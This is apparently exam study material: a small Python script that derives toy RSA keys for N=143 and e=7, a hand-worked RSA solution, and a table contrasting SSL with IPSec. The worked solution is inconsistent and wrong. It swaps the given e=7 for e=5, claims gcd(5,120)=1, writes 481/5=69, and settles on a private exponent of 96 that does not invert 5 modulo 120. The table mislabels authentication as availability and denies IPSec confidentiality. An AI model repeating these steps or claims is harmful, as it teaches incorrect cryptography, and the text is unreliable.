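```python
from math import gcd

def factor_small_modulus(n: int):
    """Step 1 by trial division: fine for a toy modulus like 143, infeasible at real RSA sizes."""
    for p in range(2, int(n ** 0.5) + 1):
        if n % p == 0:
            return p, n // p
    raise ValueError(f"{n} is not a product of two smaller factors")

def e_is_admissible(phi: int, e: int) -> bool:
    """Step 4: e must satisfy 1 < e < phi(n) and gcd(e, phi(n)) = 1."""
    return 1 < e < phi and gcd(e, phi) == 1

def rsa_parameters(n: int, e: int):
    """Steps 1-5: returns (p, q, phi(n), d) for the given modulus and public exponent."""
    p, q = factor_small_modulus(n)
    phi = (p - 1) * (q - 1)
    if not e_is_admissible(phi, e):
        raise ValueError(f"e={e} is not admissible: gcd({e}, {phi}) = {gcd(e, phi)}")
    d = pow(e, -1, phi)   # e^-1 mod phi(n); the same d that solves e*d mod phi(n) = 1
    return p, q, phi, d

def roundtrip(n: int, e: int, d: int, m: int) -> bool:
    """Check the key pair: decrypting an encrypted block with d recovers m (m < n)."""
    return pow(pow(m, e, n), d, n) == m

if __name__ == "__main__":
    p, q, phi, d = rsa_parameters(143, 7)     # the question's data: N=143, public key e=7
    print(f"p={p} q={q} phi(n)={phi} d={d}")
    print("public key {e, n} =", (7, 143), " private key {d, n} =", (d, 143))
    print("e=5 admissible:", e_is_admissible(phi, 5), "since gcd(5, phi(n)) =", gcd(5, phi))
    print("roundtrip with m=42 ok:", roundtrip(143, 7, d, 42))
```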
Given data: N=143, public key=7

Step 1: choose two distinct prime numbers p and q.
   N = 143 = 13 * 11
   Prime numbers: p = 13 and q = 11
Step 2: find n = p * q
   n = p * q = 143
Step 3: calculate ɸ(n) = (p-1) * (q-1)
   ɸ(n) = (p-1) * (q-1) = (13-1) * (11-1) = 12 * 10 = 120
Step 4: select e such that e is relatively prime to ɸ(n), i.e. gcd(e, ɸ(n)) = 1 and 1 < e < ɸ(n).
   gcd(e, 120) = 1
   gcd(5, 120) = 1 ……. e = 5 is given
Step 5: calculate d
   d = e^-1 mod ɸ(n), or e * d mod ɸ(n) = 1
   5 * d mod 120 = 1
   d = ((ɸ(n) * i) + 1) / e …………… where i = 0 to 9
   d = ((120 * 4) + 1) / 5 = 481 / 5 = 69
   d = 96
Public key = {e, n} = {5, 143}
Private key = {d, n} = {96, 143}

Difference between SSL and IPSec protocols 5M

No. | SSL | IPSec
1 | SSL stands for Secure Sockets Layer. | IPSec stands for Internet Protocol Security.
2 | The SSL protocol operates between the application and transport layers. | The IPSec protocol operates at the network layer.
3 | The SSL protocol provides confidentiality, integrity and authentication (availability). | The IPSec protocol provides integrity and authentication (availability).
4 | The SSL protocol provides protection to the browser. | IPSec provides security at the Internet (network) layer.
5 | Protocols of SSL: Handshake protocol, Record protocol, Alert protocol | IPSec has two modes: Transport mode, Tunnel mode